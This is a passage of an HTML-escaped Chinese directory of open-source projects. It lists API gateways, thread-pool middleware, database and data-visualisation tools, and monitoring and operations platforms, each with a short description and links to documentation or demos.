            &lt;a href=&quot;https://github.com/apache/apisix&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;apisix&lt;/a&gt; - &lt;code&gt;Apache&lt;/code&gt; 下的云原生 &lt;code&gt;API&lt;/code&gt; &lt;strong&gt;网关&lt;/strong&gt;。&lt;a href=&quot;https://apisix.apache.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Kong/kong&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;kong&lt;/a&gt; - 云原生 &lt;code&gt;API&lt;/code&gt; &lt;strong&gt;网关&lt;/strong&gt;。&lt;a href=&quot;https://konghq.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/apache/shenyu&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;shenyu&lt;/a&gt; - 异步的，高性能的，跨语言的，响应式的 &lt;code&gt;API&lt;/code&gt; &lt;strong&gt;网关&lt;/strong&gt;。&lt;a href=&quot;https://shenyu.apache.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;中间件项目&quot;&gt;
    &lt;a href=&quot;?id=%e4%b8%ad%e9%97%b4%e4%bb%b6%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;中间件项目&quot;&gt;中间件项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/dynamic-tp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dynamic-tp&lt;/a&gt; - 轻量级&lt;strong&gt;动态线程池&lt;/strong&gt;，内置监控告警功能，集成三方中间件线程池管理，基于主流配置中心（已支持 &lt;code&gt;Nacos&lt;/code&gt;、&lt;code&gt;Apollo&lt;/code&gt;，&lt;code&gt;Zookeeper&lt;/code&gt;、&lt;code&gt;Consul&lt;/code&gt;、&lt;code&gt;Etcd&lt;/code&gt;，可通过 &lt;code&gt;SPI&lt;/code&gt; 自定义实现）。&lt;a href=&quot;https://dynamictp.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/opengoofy/hippo4j&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hippo4j&lt;/a&gt; - 异步线程池框架，支持线程池动态变更&amp;amp;监控&amp;amp;报警。&lt;a href=&quot;https://hippo4j.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;数据操作项目&quot;&gt;
    &lt;a href=&quot;?id=%e6%95%b0%e6%8d%ae%e6%93%8d%e4%bd%9c%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;数据操作项目&quot;&gt;数据操作项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dataease/dataease&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dataease&lt;/a&gt; - 开源的&lt;strong&gt;数据可视化分析工具&lt;/strong&gt;，支持丰富的数据源连接，能够通过拖拉拽方式快速制作图表。&lt;a href=&quot;https://dataease.fit2cloud.com/#/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; 用户名：&lt;code&gt;demo&lt;/code&gt; 密码：&lt;code&gt;dataease&lt;/code&gt; &lt;a href=&quot;https://dataease.io/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/alibaba/DataX&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DataX&lt;/a&gt; - 阿里云 &lt;code&gt;DataWorks&lt;/code&gt; &lt;strong&gt;数据集成&lt;/strong&gt;的开源版本，实现了包括 &lt;code&gt;MySQL&lt;/code&gt;、&lt;code&gt;Oracle&lt;/code&gt;、&lt;code&gt;OceanBase&lt;/code&gt;、&lt;code&gt;SqlServer&lt;/code&gt;、&lt;code&gt;Postgre&lt;/code&gt;、&lt;code&gt;HDFS&lt;/code&gt;、&lt;code&gt;Hive&lt;/code&gt;、&lt;code&gt;ADS&lt;/code&gt;、&lt;code&gt;HBase&lt;/code&gt;、&lt;code&gt;TableStore(OTS)&lt;/code&gt;、&lt;code&gt;MaxCompute(ODPS)&lt;/code&gt;、&lt;code&gt;Hologres&lt;/code&gt;、&lt;code&gt;DRDS &lt;/code&gt; 等各种异构数据源之间高效的数据同步功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/taosdata/TDengine&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;TDengine&lt;/a&gt; - TDengine 是一款开源、高性能、云原生的&lt;strong&gt;时序数据库&lt;/strong&gt;（&lt;code&gt;Time Series Database&lt;/code&gt;, TSDB）, 它专为物联网、车联网、工业互联网、金融、IT 运维等场景优化设计。&lt;a href=&quot;https://docs.taosdata.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/multiprocessio/dsq&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dsq&lt;/a&gt; - 一个&lt;strong&gt;命令行工具&lt;/strong&gt;，可对数据文件进行 &lt;code&gt;SQL&lt;/code&gt; 查询，支持 &lt;code&gt;JSON&lt;/code&gt;、&lt;code&gt;CSV&lt;/code&gt;、&lt;code&gt;Excel&lt;/code&gt;、&lt;code&gt;Parquet&lt;/code&gt; 等数据文件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dbeaver/dbeaver&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dbeaver&lt;/a&gt; - 免费的通用&lt;strong&gt;数据库工具&lt;/strong&gt;和 &lt;code&gt;SQL&lt;/code&gt; 客户端。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/milvus-io/milvus&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;milvus&lt;/a&gt; - 一个云原生的矢量数据库，为下一代人工智能应用提供存储空间。&lt;a href=&quot;https://milvus.io/docs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/minio/minio&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;minio&lt;/a&gt; - 一个高性能的&lt;strong&gt;对象存储&lt;/strong&gt;，它与 &lt;code&gt;Amazon S3&lt;/code&gt; 云存储服务的 &lt;code&gt;API&lt;/code&gt; 兼容。&lt;a href=&quot;https://min.io/docs/minio/kubernetes/upstream/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/alibaba/Chat2DB&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Chat2DB&lt;/a&gt; - 智能的通用&lt;strong&gt;数据库工具&lt;/strong&gt;和 &lt;code&gt;SQL&lt;/code&gt; 客户端。&lt;a href=&quot;https://chat2db.opensource.alibaba.com/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cookieY/Yearning&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Yearning&lt;/a&gt; - 开箱即用的 &lt;code&gt;MySQL&lt;/code&gt;、 &lt;code&gt;SQL&lt;/code&gt; 审核工具。&lt;a href=&quot;http://next.yearning.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/alibaba/otter&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;otter&lt;/a&gt; - 阿里巴巴分布式数据库同步系统(解决中美异地机房)。&lt;a href=&quot;https://github.com/alibaba/otter/wiki&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/baomidou/dynamic-datasource&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dynamic-datasource&lt;/a&gt; - 一个基于 &lt;code&gt;SpringBoot&lt;/code&gt; 的快速集成多数据源的启动器。&lt;a href=&quot;https://www.kancloud.cn/tracy5546/dynamic-datasource/2264611&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hhyo/Archery&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Archery&lt;/a&gt; - &lt;code&gt;SQL&lt;/code&gt; 审核查询平台。&lt;a href=&quot;https://demo.archerydms.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://archerydms.com/home/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dunwu/db-tutorial&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;db-tutorial&lt;/a&gt; - 一个&lt;strong&gt;数据库&lt;/strong&gt;教程。&lt;a href=&quot;https://dunwu.github.io/db-tutorial/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/datageartech/datagear&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;datagear&lt;/a&gt; - 数据可视化分析平台，自由制作任何您想要的数据看板。&lt;a href=&quot;http://www.datagear.tech/documentation&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sqlmapproject/sqlmap&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;sqlmap&lt;/a&gt; - 一款强大的 &lt;code&gt;SQL&lt;/code&gt; 注入工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/slashbaseide/slashbase&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;slashbase&lt;/a&gt; - 支持 &lt;code&gt;MySQL&lt;/code&gt;、&lt;code&gt;PostgreSQL&lt;/code&gt;&amp;amp;&lt;code&gt;MongoDB&lt;/code&gt; 的数据库管理 &lt;code&gt;IDE&lt;/code&gt;.&lt;a href=&quot;https://demo.slashbase.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/TeslaFly01/SmartSqlT&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SmartSqlT&lt;/a&gt; - 一款方便、快捷的数据库文档查询、导出工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/86dbs/dbsyncer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dbsyncer&lt;/a&gt; - 一款开源的数据同步中间件。&lt;a href=&quot;https://gitee.com/ghi/dbsyncer/wikis/%E4%BB%8B%E7%BB%8D&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/drawdb-io/drawdb&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;drawdb&lt;/a&gt; - 免费、简单且直观的在线数据库设计工具和 &lt;code&gt;SQL&lt;/code&gt; 生成器。&lt;a href=&quot;https://drawdb.vercel.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gcpaas/DataRoom&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DataRoom&lt;/a&gt; - 大屏设计器。&lt;a href=&quot;http://gcpaas.gccloud.com/bigScreen/big-screen-list&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dbgate/dbgate&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dbgate&lt;/a&gt; - 跨平台数据库管理器。&lt;a href=&quot;https://demo.dbgate.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/beekeeper-studio/beekeeper-studio&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;beekeeper-studio&lt;/a&gt; - 适用于 &lt;code&gt;MySQL&lt;/code&gt;、&lt;code&gt;Postgres&lt;/code&gt;、&lt;code&gt;SQLite&lt;/code&gt;、&lt;code&gt;SQL Server&lt;/code&gt; 等的现代且易于使用的 &lt;code&gt;SQL&lt;/code&gt; 客户端。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chartdb/chartdb&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;chartdb&lt;/a&gt;- 一个功能强大的、基于网页的数据库图表编辑器。&lt;a href=&quot;https://app.chartdb.io/diagrams/wzuzvobkucys&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;测试运维监控项目&quot;&gt;
    &lt;a href=&quot;?id=%e6%b5%8b%e8%af%95%e8%bf%90%e7%bb%b4%e7%9b%91%e6%8e%a7%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;测试运维监控项目&quot;&gt;测试运维监控项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/metersphere/metersphere&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;metersphere&lt;/a&gt; - 一站式开源&lt;strong&gt;持续测试平台&lt;/strong&gt;, 涵盖测试跟踪、接口测试、&lt;code&gt;UI&lt;/code&gt; 测试和性能测试等功能，全面兼容 &lt;code&gt;JMeter&lt;/code&gt;、&lt;code&gt;Selenium&lt;/code&gt; 等主流开源标准。&lt;a href=&quot;https://www.metersphere.com/signup&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://metersphere.io/docs/v2.x/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/hertzbeat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hertzbeat&lt;/a&gt; - 易用友好的&lt;strong&gt;实时监控告警系统&lt;/strong&gt;，无需 &lt;code&gt;Agent&lt;/code&gt;，强大自定义监控能力。&lt;a href=&quot;https://console.tancloud.cn/passport/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/a597873885/webfunny_monitor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;webfunny_monitor&lt;/a&gt; - 轻量级的&lt;strong&gt;前端监控系统&lt;/strong&gt;，无埋点监控前端日志，实时分析前端健康状态。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/didi/KnowStreaming&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;KnowStreaming&lt;/a&gt; - 一套云原生的 &lt;code&gt;Kafka&lt;/code&gt; 管控平台，脱胎于众多互联网内部多年的 &lt;code&gt;Kafka&lt;/code&gt; 运营实践经验，专注于 &lt;code&gt;Kafka&lt;/code&gt; 运维管控、监控告警、资源治理、多活容灾等核心场景。&lt;a href=&quot;https://doc.knowstreaming.com/product/1-brief-introduction&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/Jpom&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Jpom&lt;/a&gt; - 简而轻的低侵入式在线构建、自动部署、日常运维、项目监控软件。&lt;a href=&quot;https://jpom.top/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/goodrain/rainbond&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;rainbond&lt;/a&gt; - &lt;strong&gt;云原生应用管理平台&lt;/strong&gt;，使用简单，不需要懂容器、&lt;code&gt;Kubernetes&lt;/code&gt; 和底层复杂技术，支持管理多个 &lt;code&gt;Kubernetes&lt;/code&gt; 集群，和管理企业应用全生命周期。主要功能包括应用开发环境、应用市场、微服务架构、应用交付、应用运维、应用级多云管理等。&lt;a href=&quot;https://www.rainbond.com/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/louislam/uptime-kuma&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;uptime-kuma&lt;/a&gt; - 简易美观的&lt;strong&gt;监控工具&lt;/strong&gt;。&lt;a href=&quot;https://demo.uptime.kuma.pet:27000/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/oshi/oshi&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;oshi&lt;/a&gt; - 基于 &lt;code&gt;JNA&lt;/code&gt;（本地）的免费的操作系统和硬件信息库，专为 &lt;code&gt;Java&lt;/code&gt; 设计。它可以跨平台的获取系统信息以及硬件信息，如操作系统版本、进程、内存和 &lt;code&gt;CPU&lt;/code&gt; 使用情况、磁盘和分区、设备、传感器等。&lt;a href=&quot;https://www.oshi.ooo/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Rudolf-Barbu/Ward&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Ward&lt;/a&gt; - 一款简单、极简主义的服务器监控工具。&lt;code&gt;SpringBoot&lt;/code&gt; 项目，集成 &lt;code&gt;OSHI&lt;/code&gt; 的使用。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/openspug/spug&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;spug&lt;/a&gt; - 面向中小型企业设计的轻量级无 &lt;code&gt;Agent&lt;/code&gt; 的&lt;strong&gt;自动化运维平台&lt;/strong&gt;，整合了主机管理、主机批量执行、主机在线终端、文件在线上传下载、应用发布部署、在线任务计划、配置中心、监控、报警等一系列功能。&lt;a href=&quot;https://demo.spug.cc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://spug.cc/docs/about-spug/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/apache/skywalking&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;skywalking&lt;/a&gt; - APM, 应用性能监控系统。&lt;a href=&quot;http://demo.skywalking.apache.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://skywalking.apache.org/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pinpoint-apm/pinpoint&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pinpoint&lt;/a&gt; - APM，（应用性能管理）工具，用于大规模分布式系统。&lt;a href=&quot;http://125.209.240.10:10123/main&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://pinpoint-apm.gitbook.io/pinpoint/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/serverless/serverless&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;serverless&lt;/a&gt; - 无服务器框架，基于 &lt;code&gt;AWS Lambda&lt;/code&gt;、&lt;code&gt;Azure Functions&lt;/code&gt;、&lt;code&gt;Google CloudFunctions&lt;/code&gt; 等无服务器架构构建网络、移动和物联网应用。&lt;a href=&quot;https://cn.serverless.com/framework/docs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/matomo-org/matomo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;matomo&lt;/a&gt; - 一款功能强大的开源 &lt;code&gt;web&lt;/code&gt; 分析工具，可以帮助跟踪和理解网站的访问者行为，以及优化网站业务。提供了丰富的报告和实时数据分析功能，并提供了一套完整的隐私保护措施，确保用户数据安全。&lt;a href=&quot;https://demo.matomo.cloud/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/1Panel-dev/1Panel&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;1Panel&lt;/a&gt; - 现代化、开源的 &lt;code&gt;Linux&lt;/code&gt; &lt;strong&gt;服务器运维管理面板&lt;/strong&gt;。&lt;a href=&quot;https://demo.1panel.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://1panel.cn/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/MauriceNino/dashdot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dashdot&lt;/a&gt; - 一个简单、现代的&lt;strong&gt;服务器仪表板&lt;/strong&gt;，主要用于小型私人服务器。&lt;a href=&quot;https://dash.mauz.dev/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/amir20/dozzle&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dozzle&lt;/a&gt; - 一个开源的日志查看器，用于监视和查看 &lt;code&gt;Docker&lt;/code&gt; 容器的实时日志。它提供一个简单而直观的 &lt;code&gt;Web&lt;/code&gt; 界面，让用户可以方便地查看运行中的 &lt;code&gt;Docker&lt;/code&gt; 容器的日志。&lt;a href=&quot;https://dozzle.dev/guide/getting-started&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/LinShunKang/MyPerf4J&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MyPerf4J&lt;/a&gt; - 一个针对高并发、低延迟应用设计的高性能 &lt;code&gt;Java&lt;/code&gt; 性能监控和统计工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/whyour/qinglong&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;qinglong&lt;/a&gt; - 支持 &lt;code&gt;Python3&lt;/code&gt;、&lt;code&gt;JavaScript&lt;/code&gt;、&lt;code&gt;Shell&lt;/code&gt;、&lt;code&gt;Typescript&lt;/code&gt; 的定时任务管理平台。&lt;a href=&quot;http://demo.ninesix.cc:4433/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://qinglong.online/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ccfos/nightingale&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nightingale&lt;/a&gt; - 告警管理专家，一体化的开源可观测平台。&lt;a href=&quot;https://flashcat.cloud/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jumpserver/jumpserver&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jumpserver&lt;/a&gt; - &lt;strong&gt;开源堡垒机&lt;/strong&gt;，符合 4A 规范的专业&lt;strong&gt;运维安全审计系统&lt;/strong&gt;。&lt;a href=&quot;https://demo.jumpserver.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.jumpserver.org/zh/v3/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
